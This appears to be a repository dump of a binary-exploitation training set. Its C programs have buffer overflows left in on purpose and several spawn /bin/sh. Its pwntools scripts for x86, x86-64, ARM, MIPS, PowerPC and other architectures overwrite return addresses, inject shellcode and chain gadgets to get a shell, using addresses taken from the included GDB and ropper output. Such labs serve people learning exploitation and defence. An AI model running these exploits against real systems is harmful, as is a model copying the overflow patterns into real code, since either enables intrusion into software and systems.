├── src ├── 00-hello-pwn.c ├── 99-test.c ├── 03-one-gadget.c ├── 06-system-rop.c ├── 07-execve-rop.c ├── 04-shellcode-static.c ├── 05-shellcode-dynamic.c ├── 02-overwrite-ret.c ├── 08-overwrite-global.c └── 01-local-overflow.c ├── rename.sh ├── .gitignore ├── pwn ├── arm │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 05-shellcode-dynamic.py │ ├── 06-system-rop.py │ ├── 07-execve-rop.py │ └── 08-overwrite-global.py ├── mips │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 08-overwrite-global.py │ ├── 06-system-rop.py │ ├── 05-shellcode-dynamic.py │ └── 07-execve-rop.py ├── ppc │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 05-shellcode-dynamic.py │ ├── 06-system-rop.py │ ├── 07-execve-rop.py │ └── 08-overwrite-global.py ├── x86 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 05-shellcode-dynamic.py │ ├── 06-system-rop.py │ ├── 03-one-gadget.py │ ├── 04-shellcode-static.py │ ├── 08-overwrite-global.py │ └── 07-execve-rop.py ├── arm64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 08-overwrite-global.py │ ├── 03-one-gadget.py │ ├── 07-execve-rop.py │ └── 05-shellcode-dynamic.py ├── mips64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 07-execve-rop.py │ ├── 08-overwrite-global.py │ └── 05-shellcode-dynamic.py ├── ppc64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 08-overwrite-global.py │ └── 07-execve-rop.py ├── sparc64 │ ├── 01-local-overflow.py │ └── 02-overwrite-ret.py └── x86-64 │ ├── 01-local-overflow.py │ ├── 02-overwrite-ret.py │ ├── 03-one-gadget.py │ ├── 05-shellcode-dynamic.py │ ├── 04-shellcode-static.py │ ├── 06-system-rop.py │ ├── 08-overwrite-global.py │ └── 07-execve-rop.py ├── README.md └── LICENSE /src/00-hello-pwn.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | system("/bin/sh"); 6 | return EXIT_SUCCESS; 7 | } 8 | -------------------------------------------------------------------------------- /src/99-test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() { 6 | execve("/bin/sh", NULL, NULL); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /rename.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -eux 4 | 5 | rename "s/$1/$2/g" $(find ./ -type f | grep -vE '\.git|\.swp') 6 | find ./ -type f | grep -vE '\.git|\.swp' | xargs sed -i -e "s/$1/$2/g" 7 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.swp 2 | *.core 3 | core 4 | bin/x86/* 5 | bin/x86-64/* 6 | bin/arm/* 7 | bin/arm64/* 8 | bin/mips/* 9 | bin/mips64/* 10 | bin/ppc/* 11 | bin/ppc64/* 12 | bin/sparc64/* 13 | -------------------------------------------------------------------------------- /src/03-one-gadget.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int vulnerable() { 6 | printf("> "); 7 | fflush(stdout); 8 | 9 | char buffer[128]; 10 | read(STDIN_FILENO, &buffer[0], 256); 11 | } 12 | 13 | int main(int argc, char** argv) { 14 | vulnerable(); 15 | 16 | return EXIT_SUCCESS; 17 | } 18 | -------------------------------------------------------------------------------- /src/06-system-rop.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int vulnerable() { 6 | printf("> "); 7 | fflush(stdout); 8 | 9 | char buffer[128]; 10 | read(STDIN_FILENO, &buffer[0], 512); 11 | } 12 | 13 | int main(int argc, char** argv) { 14 | vulnerable(); 15 | 16 | return EXIT_SUCCESS; 17 | } 18 | -------------------------------------------------------------------------------- /src/07-execve-rop.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int vulnerable() { 6 | printf("> "); 7 | fflush(stdout); 8 | 9 | char buffer[128]; 10 | read(STDIN_FILENO, &buffer[0], 1024); 11 | } 12 | 13 | int main(int argc, char** argv) { 14 | vulnerable(); 15 | 16 | return EXIT_SUCCESS; 17 | } 18 | -------------------------------------------------------------------------------- /src/04-shellcode-static.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int vulnerable() { 6 | printf("> "); 7 | fflush(stdout); 8 | 9 | char buffer[128]; 10 | read(STDIN_FILENO, &buffer[0], 512); 11 | 12 | // Dealing with cache coherency. 13 | usleep(1000); 14 | } 15 | 16 | int main(int argc, char** argv) { 17 | vulnerable(); 18 | 19 | return EXIT_SUCCESS; 20 | } 21 | -------------------------------------------------------------------------------- /src/05-shellcode-dynamic.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int vulnerable() { 6 | printf("> "); 7 | fflush(stdout); 8 | 9 | char buffer[128]; 10 | read(STDIN_FILENO, &buffer[0], 512); 11 | 12 | // Dealing with cache coherency. 13 | usleep(1000); 14 | } 15 | 16 | int main(int argc, char** argv) { 17 | vulnerable(); 18 | 19 | return EXIT_SUCCESS; 20 | } 21 | -------------------------------------------------------------------------------- /src/02-overwrite-ret.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void not_called() { 6 | printf("launching shell...\n"); 7 | system("/bin/sh"); 8 | } 9 | 10 | int vulnerable() { 11 | printf("> "); 12 | fflush(stdout); 13 | 14 | char buffer[128]; 15 | read(STDIN_FILENO, &buffer[0], 256); 16 | } 17 | 18 | int main(int argc, char** argv) { 19 | vulnerable(); 20 | 21 | return EXIT_SUCCESS; 22 | } 23 | -------------------------------------------------------------------------------- /pwn/arm/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='arm', os='linux', endian='little', word_size=32) 9 | 10 | binary_path = './bin/arm/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug([binary_path]) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p32(0xbeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/mips/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='mips', os='linux', endian='big', word_size=32) 9 | 10 | binary_path = './bin/mips/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug([binary_path]) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p32(0xbeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/ppc/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='powerpc', os='linux', endian='big', word_size=32) 9 | 10 | binary_path = './bin/ppc/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug([binary_path]) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p32(0xbeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/x86/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='x86', os='linux', endian='little', word_size=32) 9 | 10 | binary_path = './bin/x86/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug([binary_path]) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p32(0xbeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/arm64/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='aarch64', os='linux', endian='little', word_size=64) 9 | 10 | binary_path = './bin/arm64/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug([binary_path]) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p64(0xdeadbabebeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/mips64/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='mips64', os='linux', endian='big', word_size=64) 9 | 10 | binary_path = './bin/mips64/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug([binary_path]) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p64(0xdeadbabebeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/ppc64/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 9 | 10 | binary_path = './bin/ppc64/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug(['binary_path']) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p64(0xdeadbabebeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/sparc64/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='sparc64', os='linux', endian='big', word_size=64) 9 | 10 | binary_path = './bin/sparc64/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug(['binary_path']) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p64(0xdeadbabebeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /pwn/x86-64/01-local-overflow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import struct 4 | import sys 5 | 6 | from pwn import * 7 | 8 | context(arch='amd64', os='linux', endian='little', word_size=64) 9 | 10 | binary_path = './bin/x86-64/01-local-overflow' 11 | 12 | p = process(binary_path) 13 | #p = gdb.debug(['binary_path']) 14 | 15 | payload = '' 16 | payload += 'a' * 128 17 | payload += p64(0xdeadbabebeefc0de) 18 | 19 | p.readuntil('> ') 20 | p.write(payload) 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /src/08-overwrite-global.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | unsigned long x; 7 | 8 | int vulnerable() { 9 | printf("> "); 10 | fflush(stdout); 11 | 12 | char buffer[128]; 13 | read(STDIN_FILENO, &buffer[0], 1024); 14 | } 15 | 16 | void not_called() { 17 | if (x == (unsigned long)0xdeadbabebeefc0deUL) { 18 | system("/bin/sh"); 19 | } 20 | } 21 | 22 | int main(int argc, char** argv) { 23 | vulnerable(); 24 | 25 | return EXIT_SUCCESS; 26 | } 27 | -------------------------------------------------------------------------------- /src/01-local-overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | struct frame { 7 | char buffer[128]; 8 | unsigned long x; 9 | }; 10 | 11 | int main(int argc, char** argv) { 12 | struct frame f; 13 | memset(&f, 0, sizeof(f)); 14 | 15 | printf("> "); 16 | fflush(stdout); 17 | 18 | read(STDIN_FILENO, &f.buffer[0], 256); 19 | 20 | printf("x = %lx\n", f.x); 21 | if (f.x == (unsigned long)0xdeadbabebeefc0deUL) { 22 | printf("launching shell...\n"); 23 | system("/bin/sh"); 24 | } 25 | 26 | return EXIT_SUCCESS; 27 | } 28 | -------------------------------------------------------------------------------- /pwn/x86/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x804853f: file src/02-overwrite-ret.c, line 10. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:10 13 | 10 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffc0637c 0xffc0637c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffc062f0 "" 18 | """ 19 | 20 | import struct 21 | import sys 22 | 23 | from pwn import * 24 | 25 | context(arch='x86', os='linux', endian='little', word_size=32) 26 | 27 | binary_path = './bin/x86/02-overwrite-ret' 28 | 29 | vulnerable_ret_addr = 0xffc0637c 30 | buffer_addr = 0xffc062f0 31 | 32 | binary = ELF(binary_path) 33 | not_called_addr = binary.symbols['not_called'] 34 | 35 | p = process(binary_path) 36 | #p = gdb.debug([binary_path]) 37 | 38 | payload = '' 39 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 40 | payload += p32(not_called_addr) 41 | 42 | p.readuntil('> ') 43 | p.write(payload) 44 | p.interactive() 45 | -------------------------------------------------------------------------------- /pwn/arm/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x000104e0 <+0>: push {r7, lr} 7 | ... 8 | 0x00010518 <+56>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x00010518 11 | Breakpoint 1 at 0x10518: file src/02-overwrite-ret.c, line 16. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x00010518 in vulnerable () at src/02-overwrite-ret.c:16 16 | 16 } 17 | (gdb) i r $sp 18 | sp 0xfffeef20 0xfffeef20 19 | (gdb) p &buffer[0] 20 | $1 = 0xfffeeea0 'a' , "(\357\376\377)\005\001" 21 | 22 | """ 23 | 24 | import struct 25 | import sys 26 | 27 | from pwn import * 28 | 29 | context(arch='arm', os='linux', endian='little', word_size=32) 30 | 31 | binary_path = './bin/arm/02-overwrite-ret' 32 | 33 | saved_pc_addr = 0xfffeef20 + 4 34 | buffer_addr = 0xfffeeea0 35 | 36 | binary = ELF(binary_path) 37 | not_called_addr = binary.symbols['not_called'] 38 | 39 | p = process(binary_path) 40 | #p = gdb.debug([binary_path]) 41 | 42 | payload = '' 43 | payload += 'a' * (saved_pc_addr - buffer_addr) 44 | payload += p32(not_called_addr) 45 | 46 | p.readuntil('> ') 47 | p.write(payload) 48 | p.interactive() 49 | -------------------------------------------------------------------------------- /pwn/x86-64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x400662: file src/02-overwrite-ret.c, line 10. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:10 13 | 10 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7ffcdbdc39d8 0x7ffcdbdc39d8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7ffcdbdc3950 "\377\377\377\377" 18 | """ 19 | 20 | import struct 21 | import sys 22 | 23 | from pwn import * 24 | 25 | context(arch='amd64', os='linux', endian='little', word_size=64) 26 | 27 | binary_path = './bin/x86-64/02-overwrite-ret' 28 | 29 | vulnerable_ret_addr = 0x7ffcdbdc39d8 30 | buffer_addr = 0x7ffcdbdc3950 31 | 32 | binary = ELF(binary_path) 33 | not_called_addr = binary.symbols['not_called'] 34 | 35 | retq_asm = asm('retq') 36 | retq_addr = binary.search(retq_asm).next() 37 | 38 | p = process(binary_path) 39 | #p = gdb.debug([binary_path]) 40 | 41 | payload = '' 42 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 43 | payload += p64(retq_addr) # align stack 44 | payload += p64(not_called_addr) 45 | 46 | p.readuntil('> ') 47 | p.write(payload) 48 | p.interactive() 49 | -------------------------------------------------------------------------------- /pwn/arm64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400734 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x000000000040074c <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400750 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | (gdb) b *0x000000000040074c 13 | Breakpoint 2 at 0x40074c: file src/02-overwrite-ret.c, line 22. 14 | (gdb) c 15 | Continuing. 16 | 17 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11 18 | 11 printf("> "); 19 | (gdb) p &buffer[0] 20 | $1 = 0x40007ffd30 "" 21 | (gdb) c 22 | Continuing. 23 | 24 | Breakpoint 2, main (argc=1, argv=0x40007fff08) at src/02-overwrite-ret.c:22 25 | 22 } 26 | (gdb) i r $sp 27 | sp 0x40007ffdb0 0x40007ffdb0 28 | """ 29 | 30 | import struct 31 | import sys 32 | 33 | from pwn import * 34 | 35 | context(arch='aarch64', os='linux', endian='little', word_size=64) 36 | 37 | binary_path = './bin/arm64/02-overwrite-ret' 38 | 39 | saved_x30_addr = 0x40007ffdb0 + 8 40 | buffer_addr = 0x40007ffd30 41 | 42 | binary = ELF(binary_path) 43 | not_called_addr = binary.symbols['not_called'] 44 | 45 | p = process(binary_path) 46 | #p = gdb.debug([binary_path]) 47 | 48 | payload = '' 49 | payload += 'a' * (saved_x30_addr - buffer_addr) 50 | payload += p64(not_called_addr) 51 | 52 | p.readuntil('> ') 53 | p.write(payload) 54 | p.interactive() 55 | -------------------------------------------------------------------------------- /pwn/ppc/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x100005b4 <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x10000608 <+84>: lwz r0,4(r11) 9 | 0x1000060c <+88>: mtlr r0 10 | 0x10000610 <+92>: lwz r31,-4(r11) 11 | 0x10000614 <+96>: mr r1,r11 12 | 0x10000618 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x100005c8: file src/02-overwrite-ret.c, line 11. 16 | (gdb) b *0x10000608 17 | Breakpoint 2 at 0x10000608: file src/02-overwrite-ret.c, line 16. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11 22 | 11 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0xffffdd98 "\377\377\335", 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x10000608 in vulnerable () at src/02-overwrite-ret.c:16 29 | 16 } 30 | (gdb) p/x $r11+4 31 | $3 = 0xffffde24 32 | """ 33 | 34 | import struct 35 | import sys 36 | 37 | from pwn import * 38 | 39 | context(arch='powerpc', os='linux', endian='big', word_size=32) 40 | 41 | binary_path = './bin/ppc/02-overwrite-ret' 42 | 43 | saved_pc_addr = 0xffffde24 44 | buffer_addr = 0xffffdd98 45 | 46 | binary = ELF(binary_path) 47 | not_called_addr = binary.symbols['not_called'] 48 | 49 | p = process(binary_path) 50 | #p = gdb.debug([binary_path]) 51 | 52 | payload = '' 53 | payload += 'a' * (saved_pc_addr - buffer_addr) 54 | payload += p32(not_called_addr) 55 | 56 | p.readuntil('> ') 57 | p.write(payload) 58 | p.interactive() 59 | -------------------------------------------------------------------------------- /pwn/mips/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400860 <+0>: addiu sp,sp,-160 7 | 0x00400864 <+4>: sw ra,156(sp) 8 | ... 9 | 0x004008e4 <+132>: lw ra,156(sp) 10 | 0x004008e8 <+136>: lw s8,152(sp) 11 | 0x004008ec <+140>: addiu sp,sp,160 12 | 0x004008f0 <+144>: jr ra 13 | 0x004008f4 <+148>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40087c: file src/02-overwrite-ret.c, line 11. 17 | (gdb) b *0x004008e4 18 | Breakpoint 2 at 0x4008e4: file src/02-overwrite-ret.c, line 16. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11 23 | 11 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef08 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x004008e4 in vulnerable () at src/02-overwrite-ret.c:16 30 | 16 } 31 | (gdb) p/x $sp+156 32 | $3 = 0x7fffef8c 33 | """ 34 | 35 | import struct 36 | import sys 37 | 38 | from pwn import * 39 | 40 | context(arch='mips', os='linux', endian='big', word_size=32) 41 | 42 | binary_path = './bin/mips/02-overwrite-ret' 43 | 44 | ra_saved_addr = 0x7fffef8c 45 | buffer_addr = 0x7fffef08 46 | 47 | binary = ELF(binary_path) 48 | not_called_addr = binary.symbols['not_called'] 49 | 50 | p = process(binary_path) 51 | #p = gdb.debug([binary_path]) 52 | 53 | payload = '' 54 | payload += 'a' * (ra_saved_addr - buffer_addr) 55 | payload += p32(not_called_addr) 56 | 57 | p.readuntil('> ') 58 | p.write(payload) 59 | p.interactive() 60 | -------------------------------------------------------------------------------- /pwn/arm/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010490 <+0>: push {r7, lr} 7 | ... 8 | 0x000104d0 <+64>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x000104d0 11 | Breakpoint 1 at 0x104d0: file src/04-shellcode-static.c, line 14. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x000104d0 in vulnerable () at src/04-shellcode-static.c:14 16 | 14 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeeef0 'a' , ")\033k\377hp" 19 | (gdb) i r $sp 20 | sp 0xfffeef70 0xfffeef70 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/04-shellcode-static 25 | ... 26 | 17211 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 17211 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x00008b28 (0x00008b29): blx sp; 35 | """ 36 | 37 | import struct 38 | import sys 39 | 40 | from pwn import * 41 | 42 | context(arch='arm', os='linux', endian='little', word_size=32) 43 | 44 | binary_path = './bin/arm/04-shellcode-static' 45 | 46 | saved_pc_addr = 0xfffeef70 + 4 47 | buffer_addr = 0xfffeeef0 48 | libc_addr = 0xff6a9000 49 | 50 | shellcode = asm(shellcraft.sh()) 51 | 52 | p = process(binary_path) 53 | #p = gdb.debug([binary_path]) 54 | 55 | payload = '' 56 | payload += 'a' * (saved_pc_addr - buffer_addr) 57 | payload += p32(saved_pc_addr + 4) 58 | payload += shellcode 59 | 60 | p.readuntil('> ') 61 | p.write(payload) 62 | p.interactive() 63 | -------------------------------------------------------------------------------- /pwn/arm/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010490 <+0>: push {r7, lr} 7 | ... 8 | 0x000104d0 <+64>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x000104d0 11 | Breakpoint 1 at 0x104d0: file src/05-shellcode-dynamic.c, line 14. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x000104d0 in vulnerable () at src/05-shellcode-dynamic.c:14 16 | 14 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeef00 'a' , "WSt\377" 19 | (gdb) i r $sp 20 | sp 0xfffeef80 0xfffeef80 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/05-shellcode-dynamic 25 | ... 26 | 18200 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 18200 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x00008b28 (0x00008b29): blx sp; 35 | """ 36 | 37 | import struct 38 | import sys 39 | 40 | from pwn import * 41 | 42 | context(arch='arm', os='linux', endian='little', word_size=32) 43 | 44 | binary_path = './bin/arm/05-shellcode-dynamic' 45 | 46 | saved_pc_addr = 0xfffeef80 + 4 47 | buffer_addr = 0xfffeef00 48 | libc_addr = 0xff6a9000 49 | 50 | blx_sp_addr = libc_addr + 0x00008b29 51 | 52 | shellcode = asm(shellcraft.sh()) 53 | 54 | p = process(binary_path) 55 | #p = gdb.debug([binary_path]) 56 | 57 | payload = '' 58 | payload += 'a' * (saved_pc_addr - buffer_addr) 59 | payload += p32(blx_sp_addr) 60 | payload += shellcode 61 | 62 | p.readuntil('> ') 63 | p.write(payload) 64 | p.interactive() 65 | -------------------------------------------------------------------------------- /pwn/ppc64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x000000001000082c <+0>: mflr r0 7 | 0x0000000010000830 <+4>: std r0,16(r1) 8 | ... 9 | 0x000000001000088c <+96>: ld r0,16(r1) 10 | 0x0000000010000890 <+100>: mtlr r0 11 | 0x0000000010000894 <+104>: ld r31,-8(r1) 12 | 0x0000000010000898 <+108>: blr 13 | 0x000000001000089c <+112>: .long 0x0 14 | 0x00000000100008a0 <+116>: .long 0x1 15 | 0x00000000100008a4 <+120>: lwz r0,1(r1) 16 | End of assembler dump. 17 | (gdb) b vulnerable 18 | Breakpoint 1 at 0x10000840: file src/02-overwrite-ret.c, line 11. 19 | (gdb) b *0x000000001000088c 20 | Breakpoint 2 at 0x1000088c: file src/02-overwrite-ret.c, line 16. 21 | (gdb) c 22 | Continuing. 23 | 24 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11 25 | 11 printf("> "); 26 | (gdb) p &buffer[0] 27 | $1 = 0x40007ff940 "" 28 | (gdb) c 29 | Continuing. 30 | 31 | Breakpoint 2, 0x000000001000088c in vulnerable () at src/02-overwrite-ret.c:16 32 | 16 } 33 | (gdb) p/x $r1+16 34 | $2 = 0x40007ff9e0 35 | (gdb) p not_called 36 | $3 = {void ()} 0x100007d4 37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 45 | 46 | binary_path = './bin/ppc64/02-overwrite-ret' 47 | 48 | saved_pc_addr = 0x40007ff9e0 49 | buffer_addr = 0x40007ff940 50 | not_called_addr = 0x100007d4 51 | 52 | p = process(binary_path) 53 | #p = gdb.debug([binary_path]) 54 | 55 | payload = '' 56 | payload += 'a' * (saved_pc_addr - buffer_addr) 57 | payload += p64(not_called_addr) 58 | 59 | p.readuntil('> ') 60 | p.write(payload) 61 | p.interactive() 62 | -------------------------------------------------------------------------------- /pwn/x86/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484e6: file src/05-shellcode-dynamic.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf8c 0xffffcf8c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcf00 "" 18 | (gdb) info proc mappings 19 | process 7378 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 